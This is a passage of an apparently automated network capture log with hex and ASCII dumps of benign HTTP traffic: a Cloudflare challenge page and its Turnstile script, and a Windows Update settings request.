                                                                                                                                                                                                                                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                                                                                            cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                                                            cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                            origin-agent-cluster: ?1
                                                                                                                                                                                                                                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                            referrer-policy: same-origin
                                                                                                                                                                                                                                                                            document-policy: js-profiling
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 63 35 37 32 37 66 39 64 30 32 34 31 61 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: Server: cloudflareCF-RAY: 8ec5727f9d0241a1-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                                                                                                                                                                            Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                                                                                                                                                                            Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                                                                                                                                                                            Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                                                                                                                                                                            Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                                                                                                                                                                            Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                                                                                                                                                                            Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                                                                                                                                                                            Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                                                                                                                                                                            Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            14192.168.2.44975352.149.20.212443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dP4PbSHbpM+gPBT&MD=utld16HU HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                            2024-12-03 17:58:53 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                            MS-CorrelationId: 656cc937-ba89-403f-82e4-66e780840a2a
                                                                                                                                                                                                                                                                            MS-RequestId: deffd63b-bf0c-4582-8c59-1bdadceffd40
                                                                                                                                                                                                                                                                            MS-CV: oreJmSHPcEmutqfX.0
                                                                                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:52 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Content-Length: 24490
                                                                                                                                                                                                                                                                            2024-12-03 17:58:53 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                            2024-12-03 17:58:53 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            15192.168.2.449760104.18.95.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:53 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ec5727f9d0241a1&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:53 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                            Content-Length: 117973
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec5728a7b800f74-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 45 73 73 58 42 30 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                                                                                                                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1369INData Raw: 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f
                                                                                                                                                                                                                                                                            Data Ascii: uccess":"Success%21","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","feedback_report_output_
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1369INData Raw: 2c 67 62 2c 67 6c 2c 67 77 2c 67 41 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 65 54 2c 65 55 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 38 35 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 34 34 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 34 35 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 31 30 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 31 35 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 36 39 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 37 32 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28
                                                                                                                                                                                                                                                                            Data Ascii: ,gb,gl,gw,gA,gB,gC,gG,gH,eT,eU){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1485))/1+-parseInt(gI(1244))/2*(-parseInt(gI(745))/3)+parseInt(gI(1510))/4*(-parseInt(gI(1515))/5)+-parseInt(gI(569))/6+parseInt(gI(1272))/7*(parseInt(
                                                                                                                                                                                                                                                                            2024-12-03 17:58:54 UTC1369INData Raw: 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 49 73 75 6a 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 71 43 46 57 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 7a 4a 51 63 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 55 6c 58 4e 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 61 4d 69 71 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 72 78 57 65 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 50 57 54 62 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c
